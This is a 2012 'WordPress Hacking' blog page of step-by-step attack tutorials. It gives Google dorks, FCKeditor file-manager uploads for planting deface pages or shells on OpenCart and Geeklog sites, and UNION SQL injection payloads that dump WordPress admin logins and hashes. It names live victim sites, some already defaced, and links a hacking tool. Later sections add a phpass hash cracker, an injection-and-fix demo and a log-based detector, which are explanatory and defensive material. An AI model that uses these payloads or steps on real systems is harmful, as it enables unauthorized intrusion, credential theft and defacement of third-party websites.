
Showing posts with label WordPress Hacking.

Saturday, July 7, 2012

WordPress FCKeditor Upload Vulnerability - Upload Your Deface Remotely


This method is also known as the OpenCart CMS (web shop) exploit, and despite the title it is not a WordPress bug: the path used below is OpenCart's admin directory, and the vulnerable piece is the FCKeditor file-manager test page bundled with it. It is an old vulnerability, but many people still don't know about it, so I'm publishing a tutorial here.

1- Open Google.com and enter this dork:

inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

or

inurl:Powered By OpenCart
Google will give you a lot of websites; pick any one. For example I got this one:
http://www.schoolshopper.com.au/
Then simply append the vulnerable path to the website's URL.

Example
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


(The path may be different on other websites, e.g. Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a page like this will open.

Look at the connector option at the top left of the page and change the connector to PHP (see the image below).


Now use the file upload option and upload your deface page or shell.
To check the shell or deface page, open this URL:
www.site.com/deface.html
or
www.site.com/shell.php
I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html

Why this works: FCKeditor ships test pages (editor/filemanager/connectors/test.html and, in older versions, editor/filemanager/upload/test.html) that let anyone pick a server-side connector and call its FileUpload command without logging in to the application. The upload only succeeds if that connector is enabled on the server; FCKeditor's PHP connector ships with $Config['Enabled'] = false in editor/filemanager/connectors/php/config.php, so a site is exposed when someone turned the connector on and left the test pages in the web root. The fix is to delete the test pages, keep the connector disabled unless it is really needed, and, if it is needed, put it behind the application's own authentication.

Comment here if you have any problem with this tutorial.

Some demos for practice (some websites may be patched by now; it is my old collection).


Saturday, June 2, 2012

Another Easy Method of WordPress Blog Hacking (WordPress Easy Comment)

So this is a new tutorial on WordPress blog hacking. Let's start.
Open Google.com and enter this dork:
inurl:"fbconnect_action=myhome"
[Image: untitled24.JPG]
You will find many sites; select one you are comfortable with.

[Image: untitled22.JPG]
The website URL will look like this: http://www.site.com/?fbconnect_action=myhome&userid=
Now replace
?fbconnect_action=myhome&userid=
with this (note that the injected parameter is fbuserid, not userid):
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

Now the URL will look like this:
www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

What the payload does: "1 and 1=2" makes the plugin's own WHERE clause false so that only the UNION'd row comes back; concat(user_login,0x3a,user_pass) joins the login and the password hash with ':' (0x3a is a MySQL hex string literal); z0mbyak is just a column alias; and the twelve selected values have to match the column count of the plugin's original query, so this exact payload only fits this plugin.
Now you have the username and the password hash.

[Image: untitled23.JPG]
The password is not encrypted and there is nothing to decode: WordPress 2.5 and later store a phpass "portable" hash (it starts with $P$ and is salted, iterated MD5; it has nothing to do with Blowfish), and older installs stored a plain MD5 of the password. Either way it can only be cracked offline by guessing candidates, for example with hashcat (mode 400) or John the Ripper (phpass format). Download and run this software to crack this type of hash.
Then find the administrator panel. Normally it is at
www.victimsite.com/wp-admin

or
www.victimsite.com/wp-login.php

[Image: untitled26.JPG]

Last step: type the cracked username and password and log in to the website :)
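To make the hashing point concrete, here is an added example (written for this edit; it is not code from the post, from WordPress or from the phpass library) that reimplements the phpass portable-hash check WordPress uses. It shows why the stored value cannot be "decoded": the only operation available is to recompute the hash for a guessed password and compare, which is what crack() does over whatever wordlist you pass in. The only known-answer value used is the test vector from phpass's own test.php.

```python
"""Verify and crack WordPress (phpass "portable") password hashes.

Added example; not code from the post, from WordPress or from phpass.
WordPress 2.5+ stores user_pass as:

    $P$ + <1 char: log2 of the iteration count> + <8 char salt> + <22 chars: encoded MD5 state>

The value is a salted, iterated MD5. It is not encryption, so it cannot be
"decoded"; it can only be recomputed for a guessed password and compared.
"""
import hashlib
import hmac
from typing import Iterable, Optional

# phpass's own 64-character alphabet (it is not RFC 4648 base64).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass encode64: 3 input bytes -> 4 output chars, little-endian bit order."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def crypt_private(password: str, setting: str) -> str:
    """Recompute the portable hash of `password` under the cost and salt in `setting`.

    `setting` may be a full stored hash or just its first 12 characters.
    """
    if setting[:3] not in ("$P$", "$H$"):  # $H$ is phpBB's spelling of the same scheme
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:          # same bounds phpass enforces
        raise ValueError("bad cost character")
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("bad salt")
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):       # the iteration count is what slows guessing
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def check_password(password: str, stored_hash: str) -> bool:
    """True if `password` is the one behind `stored_hash` (constant-time compare)."""
    return hmac.compare_digest(crypt_private(password, stored_hash), stored_hash)


def crack(stored_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """The only way to "decode" such a hash: try candidates until one matches."""
    for candidate in wordlist:
        if check_password(candidate, stored_hash):
            return candidate
    return None


if __name__ == "__main__":
    # Known-answer vector from phpass's own test.php: the password is 'test12345'.
    known = "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0"
    print(check_password("test12345", known), check_password("test12346", known))
    print(crack(known, ["admin", "password", "test12345"]))
```

The cost character after $P$ sets 2^n MD5 rounds per guess (n=11 for the vector above, n=13 for WordPress's default of 8 rounds of phpass cost), which is exactly the work factor a cracker pays per candidate; hashcat mode 400 and John's phpass format run this same loop, just much faster.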


Easy way of hacking WordPress website

Hi, here I tell you how to hack a WordPress site the easy way; I will use an exploit to hack sites. I saw lots of messages saying "hey, can anyone tell me how to hack WordPress?", and this is an easy way with an exploit.

http://timani.net/wp-content/uploads/2010/04/wordpress-logo-300x282.png

First we search with this in Google to find sites:

inurl:"wp-content/plugins/photoracer/viewimg.php?id="

See the result:



[Image: asdmr.png]

and I'm going to test one of them, for example this one found in Google:


http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2


We are going to add the exploit. This is the exploit:


/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


and the URL will look like this:


http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


http://img638.imageshack.us/img638/2927/asddy.png



Now you can see the user and the password hash :D! Just crack the hash and it's done (it is a WordPress password hash, so you crack it by guessing; there is nothing to decrypt).
The admin panel is
http://Site/wp-login.php
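The two injections on this page (the photoracer id parameter above and the fbuserid parameter in the fbconnect_action post) are the same bug: a request value pasted into SQL text. The added example below (mine, not the plugin's code) reproduces that pattern against an in-memory SQLite database and shows the parameterised fix next to it. The table layout, the row contents and the hash value are constructed for the demo (the real plugin tables are not on the page); the payload is the page's own, adapted to SQLite syntax (user_login||':'||user_pass instead of MySQL's concat(user_login,0x3a,user_pass), and real spaces instead of the URL-encoded '+').

```python
"""UNION-based SQL injection: the page's pattern beside the fixed version.

Added example; not the plugin's code. The schema below is a constructed
stand-in for a gallery plugin's table and a wp_users table (the real layouts
are not on the page); the hash value is a placeholder, not a real hash.
"""
import sqlite3

SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO wp_users VALUES (1, 'admin', '$P$BconstructedHashValueForTheDemo');
CREATE TABLE plugin_images (id INTEGER PRIMARY KEY, c2, c3, c4, c5, c6, c7, c8, c9);
INSERT INTO plugin_images VALUES (2, 'holiday.jpg', 'x', 'x', 'x', 'x', 'x', 'x', 'x');
"""

# The page's payload, adapted to SQLite: MySQL's concat(a,0x3a,b) becomes a||':'||b
# and the URL-encoded '+' becomes a real space. The 9 selected values match the 9
# columns of the original query; a mismatch would be a syntax error, not a leak.
PAYLOAD = "-1 union select 1,2,3,4,5,user_login||':'||user_pass,7,8,9 from wp_users--"


def open_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def view_image_vulnerable(con: sqlite3.Connection, id_param: str) -> list:
    """The bug on the page: the request value is pasted into the SQL text."""
    sql = f"SELECT * FROM plugin_images WHERE id={id_param}"
    return con.execute(sql).fetchall()


def view_image_fixed(con: sqlite3.Connection, id_param: str) -> list:
    """Fix: validate the type and bind the value, so it can never become SQL syntax."""
    try:
        image_id = int(id_param)
    except ValueError:
        return []
    return con.execute("SELECT * FROM plugin_images WHERE id = ?", (image_id,)).fetchall()


if __name__ == "__main__":
    db = open_db()
    print(view_image_vulnerable(db, "2"))       # the legitimate row
    print(view_image_vulnerable(db, PAYLOAD))   # admin:<hash> appears in column 6
    print(view_image_fixed(db, PAYLOAD))        # []
```

In a WordPress plugin the equivalent of the bound query is $wpdb->prepare('... WHERE id = %d', $id); the int() check on its own is not a substitute for binding, it just rejects garbage early, and binding on its own would already stop the leak because the whole string is compared as a value rather than parsed as SQL.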


Geeklog Remote Deface Upload Vulnerability

Geeklog Remote Deface Upload Vulnerability. This is the same FCKeditor upload test page as in the WordPress FCKeditor upload vulnerability (read that post first); in Geeklog only the path is different.


Let's start.
Open google.com and enter this dork:
inurl:"/geeklog/"
or
index of/ geeklog/fckeditor/editor/filemanager/upload/test.html


Now go to site.com/geeklog/
Then put the path /geeklog/fckeditor/editor/filemanager/upload/test.html after the domain (.com, .net, etc.). The path is case-sensitive on most servers, so use lowercase as in the demo below.
Now the URL will be
site.com/geeklog/fckeditor/editor/filemanager/upload/test.html

Now select PHP in
Select the "File Uploader" to use:


Now upload your deface :)

Live Demo
http://www.sightline4bd.com/geeklog/
http://www.sightline4bd.com/geeklog/fckeditor/editor/filemanager/upload/test.html
http://sightline4bd.com/geeklog/images/libraryHack.htm
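From the defender's side, every request on this page leaves a clear trace in the web server's access log: a hit on an FCKeditor test page or connector (the OpenCart and Geeklog posts), or a query string carrying union/select and wp_users (the two WordPress plugin posts). The added example below (mine, not from any of the posts) scans Apache combined-format log lines for exactly those patterns, after URL-decoding so that '+' and %20 cannot hide the keywords. The log lines are constructed for the demo with documentation-range IP addresses and invented timestamps; the regexes are my own.

```python
"""Flag the requests on this page in an Apache combined-format access log.

Added example; not from any of the posts. Sample lines are constructed
(documentation-range IPs, invented timestamps). Regexes are my own and
cover: FCKeditor file-manager test pages and connectors (OpenCart/Geeklog
posts) and UNION-style injection markers in query strings (the two
WordPress plugin posts).
"""
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
203.0.113.5 - - [07/Jul/2012:10:01:12 +0000] "GET /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Jul/2012:10:01:40 +0000] "POST /admin/view/javascript/fckeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 233 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Jul/2012:10:02:03 +0000] "GET /xd.html HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Jun/2012:08:15:22 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 9981 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Jun/2012:08:16:01 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1%20union%20select%201,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9%20from%20wp_users-- HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.0.2.77 - - [02/Jun/2012:08:20:00 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=2 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.0.2.78 - - [02/Jun/2012:08:21:00 +0000] "GET /geeklog/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# FCKeditor's shipped test pages and the server-side connector/upload scripts behind them.
FCK_RE = re.compile(
    r"fckeditor/editor/filemanager/(connectors|upload)/"
    r"(test\.html|[a-z]+/(connector|upload)\.[a-z]+)",
    re.I,
)

# Markers of the UNION-based injection used on this page; checked on the decoded query.
SQLI_RE = re.compile(r"\bunion\b.{0,40}\bselect\b|\bwp_users\b|\bconcat\s*\(", re.I)


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path: str) -> list:
    """Reasons a request path is suspicious (empty list means nothing matched)."""
    decoded = unquote_plus(path)  # '+' -> space, %20 -> space, so keywords line up
    reasons = []
    if FCK_RE.search(decoded):
        reasons.append("fckeditor file-manager endpoint")
    query = decoded.partition("?")[2]
    if query and SQLI_RE.search(query):
        reasons.append("sql injection marker in query string")
    return reasons


def scan(log_text: str) -> list:
    """(line number, client ip, status, reason) for every suspicious request."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        for reason in classify(rec["path"]):
            findings.append((n, rec["ip"], rec["status"], reason))
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 404 on test.html still means someone probed for it, which is why the last sample line is flagged. A 200 on test.html does not by itself mean uploads work; what matters is the POST to connector.php (or upload.php) followed by a GET of a file the site never served before, like xd.html in the OpenCart post or libraryHack.htm in the Geeklog one, so correlate the flagged lines by client IP and time.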


Mr.Dark Soul's WordPress Blog Hacker

It's a WordPress hacking program called Mr.Dark Soul WordPress Blog Hacker, a tool aimed at newbies who want to hack WP blogs. The screenshots are enough to show how it is used.


Click on the images for a larger size, or use the image links:
http://i.imgur.com/BCXFD.gif
http://i.imgur.com/ywccU.gif
http://i.imgur.com/dhn43.gif
http://i.imgur.com/yJxc2.gif

[Image: BCXFD.gif]

[Image: ywccU.gif]

[Image: dhn43.gif]

[Image: yJxc2.gif]



Download link: http://www.2shared.com/file/0hiKLwdP/MrDark_Soul_Wordpress_Blog_Hac.html

